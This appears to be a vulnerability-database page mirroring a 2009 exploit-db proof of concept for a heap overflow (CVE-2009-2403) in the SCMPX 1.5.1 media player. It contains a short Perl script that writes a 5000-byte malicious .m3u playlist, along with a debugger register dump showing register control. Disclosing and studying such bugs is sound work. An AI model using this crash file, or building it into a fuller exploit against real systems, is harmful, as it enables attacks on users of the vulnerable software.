Lucene search
+L

SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)

🗓️ 29 Jun 2009 00:00:00Reported by hack4loveType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

SCMPX 1.5.1 '.m3u' Local Heap Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2403
29 Jun 200900:00
circl
cve
CVE
CVE-2009-2403
9 Jul 200916:00
cve
cvelist
Cvelist
CVE-2009-2403
9 Jul 200916:00
cvelist
nvd
NVD
CVE-2009-2403
9 Jul 200916:30
nvd
prion
Prion
Heap overflow
9 Jul 200916:30
prion
ptsecurity
Positive Technologies
PT-2009-4831 · Scmpx · Scmpx
9 Jul 200900:00
ptsecurity
#!/usr/bin/perl
#
#
# ###############################################################################
# SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC
# ###############################################################################

# Found By :: HACK4LOVE

## Olly registers
#EAX 00A71FF8
#ECX 41414141 _____>>control over the register
#EDX 41414141
#EBX 00000180
#ESP 0012E758
#EBP 0012E778
#ESI 00000008
#EDI 00000017
#EIP 00465B25 SCMPX.00465B25
##################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.M3U');
print myfile $crash;
##################################################################################

# milw0rm.com [2009-06-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.06988
35